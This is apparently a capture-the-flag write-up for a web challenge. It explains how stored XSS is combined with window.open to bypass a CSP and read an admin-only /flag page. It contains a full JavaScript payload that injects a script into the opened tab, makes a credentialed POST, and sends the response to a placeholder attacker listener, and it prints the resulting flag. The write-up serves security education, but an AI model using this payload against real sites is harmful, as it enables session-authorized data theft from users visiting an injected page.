web/California-state-police
We are given an admin bot, and its cookie is set with HttpOnly and SameSite=Lax.
HttpOnly is what stops us from reading the cookie with document.cookie: it returns an empty string.
SameSite=Lax only restricts cross-site requests, so navigations and requests that stay on the challenge origin (which is where our XSS runs) still carry the cookie.
Website Overview
We have a home page with a form that is vulnerable to stored XSS.
Source code review
We can see that a CSP is set.
We can paste the policy into Google's CSP Evaluator to check which directives are weak.
How to Get Flag ?
We have a /flag route that only the admin can access.
These were my leads during the CTF. I couldn't solve it, so after the CTF I checked a payload, and in its first line I saw window.open.
With that clue in mind I started this challenge again.
These are the things we can and cannot do under that CSP:
we can inject a script into the page;
we can't fetch (or otherwise read) the /flag route from that page, because the policy blocks the request;
we can only execute JS in the present page, but the window object gives us more than the current document: we can open another same-origin tab and script it through the handle window.open() returns.
With these in mind, let's plan a payload.
We open /flag in another tab with window.open(). The handle it returns is same-origin, so we can execute code in that tab through it.
Once /flag has loaded in that tab, we inject something that makes a POST request to /flag from inside that tab (the admin cookie goes along, since the request stays on the challenge origin) and sends the response to our server.
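The plan above written out as a JavaScript payload. This is an added example, not the author's payload or the challenge's code. The names FLAG_PATH, EXFIL_URL, buildChildScript, tryInject and exfiltrateFlag are chosen here; https://attacker.example/collect is a placeholder for a listener you control. It assumes /flag is served from the same origin as the XSS page and that the /flag document does not itself carry a CSP that blocks an injected inline script or its outgoing requests. The handle is polled instead of given a load listener, because a listener attached to the popup's initial about:blank window is not guaranteed to survive the navigation to /flag.

```javascript
// Added example (not the original writeup's payload).
// Assumptions: the XSS page can run our JS but its CSP blocks fetch() to /flag;
// /flag is same-origin; the /flag document has no CSP that blocks an injected
// inline script; EXFIL_URL is a placeholder for an attacker-controlled listener.
const FLAG_PATH = '/flag';
const EXFIL_URL = 'https://attacker.example/collect'; // placeholder (assumption)

// Source of the script that will run inside the opened /flag tab, under that
// tab's policy rather than the XSS page's. It POSTs to /flag (same-origin, so the
// admin's HttpOnly cookie is attached) and forwards the response body to us.
function buildChildScript(flagPath, exfilUrl) {
  return `
    fetch(${JSON.stringify(flagPath)}, { method: 'POST', credentials: 'include' })
      .then(r => r.text())
      .then(body => navigator.sendBeacon(${JSON.stringify(exfilUrl)}, body));
  `;
}

// Inject the child script once the handle actually points at a fully loaded
// /flag document. Returns false (and does nothing) while the tab is still on
// about:blank or still loading. Reading location on a cross-origin document
// throws, so that case is treated as "not ready" too.
function tryInject(child, flagPath, exfilUrl) {
  try {
    if (child.location.pathname !== flagPath) return false;
    if (child.document.readyState !== 'complete') return false;
  } catch (e) {
    return false;
  }
  const s = child.document.createElement('script');
  s.textContent = buildChildScript(flagPath, exfilUrl);
  child.document.head.appendChild(s);
  return true;
}

// Open /flag in a new tab and script it through the returned handle.
// `win` is passed in so the same function can be driven by the real window
// in the browser or by a fake one in a test.
function exfiltrateFlag(win, flagPath = FLAG_PATH, exfilUrl = EXFIL_URL) {
  const child = win.open(flagPath);
  if (!child) throw new Error('window.open returned null (popup blocked?)');
  if (tryInject(child, flagPath, exfilUrl)) return child;
  const timer = win.setInterval(() => {
    if (tryInject(child, flagPath, exfilUrl)) win.clearInterval(timer);
  }, 50);
  return child;
}

// In the browser (i.e. inside the stored-XSS payload) run immediately.
if (typeof window !== 'undefined') exfiltrateFlag(window);
```

To use it, swap in a real listener URL and place the block as the body of the injected script in the stored-XSS form; the admin bot visits the page, the popup loads /flag with the admin's cookie, and the injected script posts the response to the listener.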
After submitting the crime carrying this payload to the admin bot, we get the flag.
lactf{m4yb3_g1v1ng_fr33_xss_1s_jus7_4_b4d_1d3a}
Homework (not exactly homework):
I want the web team members to come up with another way to do this without using fetch.